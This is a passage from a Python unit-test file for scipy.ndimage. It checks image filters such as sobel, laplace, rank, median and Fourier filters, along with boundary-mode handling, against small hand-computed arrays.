t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 0)
output = numpy.zeros(array.shape, type_)
output = ndimage.sobel(array, 1)
assert_array_almost_equal(t, output)
def test_sobel04(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.sobel(array, -1)
output = ndimage.sobel(array, 1)
assert_array_almost_equal(t, output)
def test_laplace01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.correlate1d(array, [1, -2, 1], 0)
tmp2 = ndimage.correlate1d(array, [1, -2, 1], 1)
output = ndimage.laplace(array)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_laplace02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.correlate1d(array, [1, -2, 1], 0)
tmp2 = ndimage.correlate1d(array, [1, -2, 1], 1)
output = numpy.zeros(array.shape, type_)
ndimage.laplace(array, output=output)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_gaussian_laplace01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [2, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 2])
output = ndimage.gaussian_laplace(array, 1.0)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_gaussian_laplace02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [2, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 2])
output = numpy.zeros(array.shape, type_)
ndimage.gaussian_laplace(array, 1.0, output)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_generic_laplace01(self):
def derivative2(input, axis, output, mode, cval, a, b):
sigma = [a, b / 2.0]
input = numpy.asarray(input)
order = [0] * input.ndim
order[axis] = 2
return ndimage.gaussian_filter(input, sigma, order,
output, mode, cval)
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = numpy.zeros(array.shape, type_)
tmp = ndimage.generic_laplace(array, derivative2,
extra_arguments=(1.0,),
extra_keywords={'b': 2.0})
ndimage.gaussian_laplace(array, 1.0, output)
assert_array_almost_equal(tmp, output)
def test_gaussian_gradient_magnitude01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [1, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 1])
output = ndimage.gaussian_gradient_magnitude(array, 1.0)
expected = tmp1 * tmp1 + tmp2 * tmp2
expected = numpy.sqrt(expected).astype(type_)
assert_array_almost_equal(expected, output)
def test_gaussian_gradient_magnitude02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [1, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 1])
output = numpy.zeros(array.shape, type_)
ndimage.gaussian_gradient_magnitude(array, 1.0, output)
expected = tmp1 * tmp1 + tmp2 * tmp2
expected = numpy.sqrt(expected).astype(type_)
assert_array_almost_equal(expected, output)
def test_generic_gradient_magnitude01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], numpy.float64)
def derivative(input, axis, output, mode, cval, a, b):
sigma = [a, b / 2.0]
input = numpy.asarray(input)
order = [0] * input.ndim
order[axis] = 1
return ndimage.gaussian_filter(input, sigma, order,
output, mode, cval)
tmp1 = ndimage.gaussian_gradient_magnitude(array, 1.0)
tmp2 = ndimage.generic_gradient_magnitude(
array, derivative, extra_arguments=(1.0,),
extra_keywords={'b': 2.0})
assert_array_almost_equal(tmp1, tmp2)
def test_uniform01(self):
array = numpy.array([2, 4, 6])
size = 2
output = ndimage.uniform_filter1d(array, size, origin=-1)
assert_array_almost_equal([3, 5, 6], output)
def test_uniform02(self):
array = numpy.array([1, 2, 3])
filter_shape = [0]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal(array, output)
def test_uniform03(self):
array = numpy.array([1, 2, 3])
filter_shape = [1]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal(array, output)
def test_uniform04(self):
array = numpy.array([2, 4, 6])
filter_shape = [2]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal([2, 3, 5], output)
def test_uniform05(self):
array = []
filter_shape = [1]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal([], output)
def test_uniform06(self):
filter_shape = [2, 2]
for type1 in self.types:
array = numpy.array([[4, 8, 12],
[16, 20, 24]], type1)
for type2 in self.types:
output = ndimage.uniform_filter(
array, filter_shape, output=type2)
assert_array_almost_equal([[4, 6, 10], [10, 12, 16]], output)
assert_equal(output.dtype.type, type2)
def test_minimum_filter01(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([2])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([1, 1, 2, 3, 4], output)
def test_minimum_filter02(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([1, 1, 2, 3, 4], output)
def test_minimum_filter03(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([2])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([3, 2, 2, 1, 1], output)
def test_minimum_filter04(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([2, 2, 1, 1, 1], output)
def test_minimum_filter05(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], output)
def test_minimum_filter05_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
ndimage.minimum_filter(array, filter_shape, output=array)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], array)
def test_minimum_filter06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 1, 1], [1, 1, 1]]
output = ndimage.minimum_filter(array, footprint=footprint)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], output)
# separable footprint should allow mode sequence
output2 = ndimage.minimum_filter(array, footprint=footprint,
mode=['reflect', 'reflect'])
assert_array_almost_equal(output2, output)
def test_minimum_filter07(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.minimum_filter(array, footprint=footprint)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], output)
with assert_raises(RuntimeError):
ndimage.minimum_filter(array, footprint=footprint,
mode=['reflect', 'constant'])
def test_minimum_filter08(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.minimum_filter(array, footprint=footprint, origin=-1)
assert_array_almost_equal([[3, 1, 3, 1, 1],
[5, 3, 3, 1, 1],
[3, 3, 1, 1, 1]], output)
def test_minimum_filter09(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.minimum_filter(array, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal([[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1],
[5, 3, 3, 1, 1]], output)
def test_maximum_filter01(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([2])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([1, 2, 3, 4, 5], output)
def test_maximum_filter02(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([2, 3, 4, 5, 5], output)
def test_maximum_filter03(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([2])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([3, 3, 5, 5, 4], output)
def test_maximum_filter04(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([3, 5, 5, 5, 4], output)
def test_maximum_filter05(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([[3, 5, 5, 5, 4],
[7, 9, 9, 9, 5],
[8, 9, 9, 9, 7]], output)
def test_maximum_filter06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 1, 1], [1, 1, 1]]
output = ndimage.maximum_filter(array, footprint=footprint)
assert_array_almost_equal([[3, 5, 5, 5, 4],
[7, 9, 9, 9, 5],
[8, 9, 9, 9, 7]], output)
# separable footprint should allow mode sequence
output2 = ndimage.maximum_filter(array, footprint=footprint,
mode=['reflect', 'reflect'])
assert_array_almost_equal(output2, output)
def test_maximum_filter07(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.maximum_filter(array, footprint=footprint)
assert_array_almost_equal([[3, 5, 5, 5, 4],
[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7]], output)
# non-separable footprint should not allow mode sequence
with assert_raises(RuntimeError):
ndimage.maximum_filter(array, footprint=footprint,
mode=['reflect', 'reflect'])
def test_maximum_filter08(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.maximum_filter(array, footprint=footprint, origin=-1)
assert_array_almost_equal([[7, 9, 9, 5, 5],
[9, 8, 9, 7, 5],
[8, 8, 7, 7, 7]], output)
def test_maximum_filter09(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.maximum_filter(array, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_rank01(self):
array = numpy.array([1, 2, 3, 4, 5])
output = ndimage.rank_filter(array, 1, size=2)
assert_array_almost_equal(array, output)
output = ndimage.percentile_filter(array, 100, size=2)
assert_array_almost_equal(array, output)
output = ndimage.median_filter(array, 2)
assert_array_almost_equal(array, output)
def test_rank02(self):
array = numpy.array([1, 2, 3, 4, 5])
output = ndimage.rank_filter(array, 1, size=[3])
assert_array_almost_equal(array, output)
output = ndimage.percentile_filter(array, 50, size=3)
assert_array_almost_equal(array, output)
output = ndimage.median_filter(array, (3,))
assert_array_almost_equal(array, output)
def test_rank03(self):
array = numpy.array([3, 2, 5, 1, 4])
output = ndimage.rank_filter(array, 1, size=[2])
assert_array_almost_equal([3, 3, 5, 5, 4], output)
output = ndimage.percentile_filter(array, 100, size=2)
assert_array_almost_equal([3, 3, 5, 5, 4], output)
def test_rank04(self):
array = numpy.array([3, 2, 5, 1, 4])
expected = [3, 3, 2, 4, 4]
output = ndimage.rank_filter(array, 1, size=3)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 50, size=3)
assert_array_almost_equal(expected, output)
output = ndimage.median_filter(array, size=3)
assert_array_almost_equal(expected, output)
def test_rank05(self):
array = numpy.array([3, 2, 5, 1, 4])
expected = [3, 3, 2, 4, 4]
output = ndimage.rank_filter(array, -2, size=3)
assert_array_almost_equal(expected, output)
def test_rank06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
expected = [[2, 2, 1, 1, 1],
[3, 3, 2, 1, 1],
[5, 5, 3, 3, 1]]
output = ndimage.rank_filter(array, 1, size=[2, 3])
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 17, size=(2, 3))
assert_array_almost_equal(expected, output)
def test_rank06_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
array_copy = array.copy()
expected = [[2, 2, 1, 1, 1],
[3, 3, 2, 1, 1],
[5, 5, 3, 3, 1]]
ndimage.rank_filter(array, 1, size=[2, 3], output=array)
assert_array_almost_equal(expected, array)
ndimage.percentile_filter(array_copy, 17, size=(2, 3),
output=array_copy)
assert_array_almost_equal(expected, array_copy)
def test_rank07(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
expected = [[3, 5, 5, 5, 4],
[5, 5, 7, 5, 4],
[6, 8, 8, 7, 5]]
output = ndimage.rank_filter(array, -2, size=[2, 3])
assert_array_almost_equal(expected, output)
def test_rank08(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
expected = [[3, 3, 2, 4, 4],
[5, 5, 5, 4, 4],
[5, 6, 7, 5, 5]]
output = ndimage.percentile_filter(array, 50.0, size=(2, 3))
assert_array_almost_equal(expected, output)
output = ndimage.rank_filter(array, 3, size=(2, 3))
assert_array_almost_equal(expected, output)
output = ndimage.median_filter(array, size=(2, 3))
assert_array_almost_equal(expected, output)
# non-separable: does not allow mode sequence
with assert_raises(RuntimeError):
ndimage.percentile_filter(array, 50.0, size=(2, 3),
mode=['reflect', 'constant'])
with assert_raises(RuntimeError):
ndimage.rank_filter(array, 3, size=(2, 3), mode=['reflect']*2)
with assert_raises(RuntimeError):
ndimage.median_filter(array, size=(2, 3), mode=['reflect']*2)
def test_rank09(self):
expected = [[3, 3, 2, 4, 4],
[3, 5, 2, 5, 1],
[5, 5, 8, 3, 5]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 1, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 35, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank10(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
expected = [[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]]
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.rank_filter(array, 0, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 0.0, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank11(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
expected = [[3, 5, 5, 5, 4],
[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7]]
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.rank_filter(array, -1, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 100.0, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank12(self):
expected = [[3, 3, 2, 4, 4],
[3, 5, 2, 5, 1],
[5, 5, 8, 3, 5]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 1, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 50.0,
footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.median_filter(array, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank13(self):
expected = [[5, 2, 5, 1, 1],
[5, 8, 3, 5, 5],
[6, 6, 5, 5, 5]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 1, footprint=footprint,
origin=-1)
assert_array_almost_equal(expected, output)
def test_rank14(self):
expected = [[3, 5, 2, 5, 1],
[5, 5, 8, 3, 5],
[5, 6, 6, 5, 5]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 1, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal(expected, output)
def test_rank15(self):
"rank filter 15"
expected = [[2, 3, 1, 4, 1],
[5, 3, 7, 1, 1],
[5, 5, 3, 3, 3]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 0, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal(expected, output)
def test_generic_filter1d01(self):
weights = numpy.array([1.1, 2.2, 3.3])
def _filter_func(input, output, fltr, total):
fltr = fltr / total
for ii in range(input.shape[0] - 2):
output[ii] = input[ii] * fltr[0]
output[ii] += input[ii + 1] * fltr[1]
output[ii] += input[ii + 2] * fltr[2]
for type_ in self.types:
a = numpy.arange(12, dtype=type_)
a.shape = (3, 4)
r1 = ndimage.correlate1d(a, weights / weights.sum(), 0, origin=-1)
r2 = ndimage.generic_filter1d(
a, _filter_func, 3, axis=0, origin=-1,
extra_arguments=(weights,),
extra_keywords={'total': weights.sum()})
assert_array_almost_equal(r1, r2)
def test_generic_filter01(self):
filter_ = numpy.array([[1.0, 2.0], [3.0, 4.0]])
footprint = numpy.array([[1, 0], [0, 1]])
cf = numpy.array([1., 4.])
def _filter_func(buffer, weights, total=1.0):
weights = cf / total
return (buffer * weights).sum()
for type_ in self.types:
a = numpy.arange(12, dtype=type_)
a.shape = (3, 4)
r1 = ndimage.correlate(a, filter_ * footprint)
if type_ in self.float_types:
r1 /= 5
else:
r1 //= 5
r2 = ndimage.generic_filter(
a, _filter_func, footprint=footprint, extra_arguments=(cf,),
extra_keywords={'total': cf.sum()})
assert_array_almost_equal(r1, r2)
# generic_filter doesn't allow mode sequence
with assert_raises(RuntimeError):
r2 = ndimage.generic_filter(
a, _filter_func, mode=['reflect', 'reflect'],
footprint=footprint, extra_arguments=(cf,),
extra_keywords={'total': cf.sum()})
def test_extend01(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([1, 0])
expected_values = [[1, 1, 2],
[3, 1, 2],
[1, 1, 2],
[2, 1, 2],
[0, 1, 2]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate1d(array, weights, 0,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend02(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([1, 0, 0, 0, 0, 0, 0, 0])
expected_values = [[1, 1, 1],
[3, 1, 2],
[3, 3, 2],
[1, 2, 3],
[0, 0, 0]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate1d(array, weights, 0,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend03(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([0, 0, 1])
expected_values = [[2, 3, 3],
[2, 3, 1],
[2, 3, 3],
[2, 3, 2],
[2, 3, 0]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate1d(array, weights, 0,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend04(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
expected_values = [[3, 3, 3],
[2, 3, 1],
[2, 1, 1],
[1, 2, 3],
[0, 0, 0]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate1d(array, weights, 0,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend05(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
weights = numpy.array([[1, 0], [0, 0]])
expected_values = [[[1, 1, 2], [1, 1, 2], [4, 4, 5]],
[[9, 7, 8], [3, 1, 2], [6, 4, 5]],
[[1, 1, 2], [1, 1, 2], [4, 4, 5]],
[[5, 4, 5], [2, 1, 2], [5, 4, 5]],
[[0, 0, 0], [0, 1, 2], [0, 4, 5]]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend06(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
weights = numpy.array([[0, 0, 0], [0, 0, 0], [0, 0, 1]])
expected_values = [[[5, 6, 6], [8, 9, 9], [8, 9, 9]],
[[5, 6, 4], [8, 9, 7], [2, 3, 1]],
[[5, 6, 6], [8, 9, 9], [8, 9, 9]],
[[5, 6, 5], [8, 9, 8], [5, 6, 5]],
[[5, 6, 0], [8, 9, 0], [0, 0, 0]]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend07(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
expected_values = [[3, 3, 3],
[2, 3, 1],
[2, 1, 1],
[1, 2, 3],
[0, 0, 0]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights, mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend08(self):
array = numpy.array([[1], [2], [3]])
weights = numpy.array([[0], [0], [0], [0], [0], [0], [0], [0], [1]])
expected_values = [[[3], [3], [3]],
[[2], [3], [1]],
[[2], [1], [1]],
[[1], [2], [3]],
[[0], [0], [0]]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights, mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend09(self):
array = numpy.array([1, 2, 3])
weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
expected_values = [[3, 3, 3],
[2, 3, 1],
[2, 1, 1],
[1, 2, 3],
[0, 0, 0]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_extend10(self):
array = numpy.array([[1], [2], [3]])
weights = numpy.array([[0], [0], [0], [0], [0], [0], [0], [0], [1]])
expected_values = [[[3], [3], [3]],
[[2], [3], [1]],
[[2], [1], [1]],
[[1], [2], [3]],
[[0], [0], [0]]]
for mode, expected_value in zip(self.modes, expected_values):
output = ndimage.correlate(array, weights,
mode=mode, cval=0)
assert_array_equal(output, expected_value)
def test_boundaries(self):
def shift(x):
return (x[0] + 0.5,)
data = numpy.array([1, 2, 3, 4.])
expected = {'constant': [1.5, 2.5, 3.5, -1, -1, -1, -1],
'wrap': [1.5, 2.5, 3.5, 1.5, 2.5, 3.5, 1.5],
'mirror': [1.5, 2.5, 3.5, 3.5, 2.5, 1.5, 1.5],
'nearest': [1.5, 2.5, 3.5, 4, 4, 4, 4]}
for mode in expected:
assert_array_equal(
expected[mode],
ndimage.geometric_transform(data, shift, cval=-1, mode=mode,
output_shape=(7,), order=1))
def test_boundaries2(self):
def shift(x):
return (x[0] - 0.9,)
data = numpy.array([1, 2, 3, 4])
expected = {'constant': [-1, 1, 2, 3],
'wrap': [3, 1, 2, 3],
'mirror': [2, 1, 2, 3],
'nearest': [1, 1, 2, 3]}
for mode in expected:
assert_array_equal(
expected[mode],
ndimage.geometric_transform(data, shift, cval=-1, mode=mode,
output_shape=(4,)))
def test_fourier_gaussian_real01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.float32, numpy.float64], [6, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.rfft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_gaussian(a, [5.0, 2.5], shape[0], 0)
a = fft.ifft(a, shape[1], 1)
a = fft.irfft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a), 1, decimal=dec)
def test_fourier_gaussian_complex01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.complex64, numpy.complex128], [6, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.fft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_gaussian(a, [5.0, 2.5], -1, 0)
a = fft.ifft(a, shape[1], 1)
a = fft.ifft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
def test_fourier_uniform_real01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.float32, numpy.float64], [6, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.rfft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_uniform(a, [5.0, 2.5], shape[0], 0)
a = fft.ifft(a, shape[1], 1)
a = fft.irfft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a), 1.0, decimal=dec)
def test_fourier_uniform_complex01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.complex64, numpy.complex128], [6, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.fft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_uniform(a, [5.0, 2.5], -1, 0)
a = fft.ifft(a, shape[1], 1)
a = fft.ifft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
def test_fourier_shift_real01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.float32, numpy.float64], [4, 11]):
expected = numpy.arange(shape[0] * shape[1], dtype=type_)
expected.shape = shape
a = fft.rfft(expected, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_shift(a, [1, 1], shape[0], 0)
a = fft.ifft(a, shape[1], 1)
a = fft.irfft(a, shape[0], 0)
assert_array_almost_equal(a[1:, 1:], expected[:-1, :-1],
decimal=dec)
assert_array_almost_equal(a.imag, numpy.zeros(shape),
decimal=dec)
def test_fourier_shift_complex01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.complex64, numpy.complex128], [4, 11]):
expected = numpy.arange(shape[0] * shape[1], dtype=type_)
expected.shape = shape
a = fft.fft(expected, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_shift(a, [1, 1], -1, 0)
a = fft.ifft(a, shape[1], 1)
a = fft.ifft(a, shape[0], 0)
assert_array_almost_equal(a.real[1:, 1:], expected[:-1, :-1],
decimal=dec)
assert_array_almost_equal(a.imag, numpy.zeros(shape),
decimal=dec)
def test_fourier_ellipsoid_real01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.float32, numpy.float64], [5, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.rfft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_ellipsoid(a, [5.0, 2.5],
shape[0], 0)
a = fft.ifft(a, shape[1], 1)
a = fft.irfft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a), 1.0, decimal=dec)
def test_fourier_ellipsoid_complex01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.complex64, numpy.complex128],
[5, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.fft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_ellipsoid(a, [5.0, 2.5], -1, 0)
a = fft.ifft(a, shape[1], 1)
a = fft.ifft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
def test_spline01(self):
for type_ in self.types:
data = numpy.ones([], type_)
for order in range(2, 6):
out = ndimage.spline_filter(data, order=order)
assert_array_almost_equal(out, 1)
def test_spline02(self):
for type_ in self.types:
data = numpy.array([1], type_)
for order in range(2, 6):
out = ndimage.spline_filter(data, order=order)
assert_array_almost_equal(out, [1])
def test_spline03(self):
for type_ in self.types:
data = numpy.ones([], type_)
for order in range(2, 6):
out = ndimage.spline_filter(data, order,
output=type_)
assert_array_almost_equal(out, 1)
def test_spline04(self):
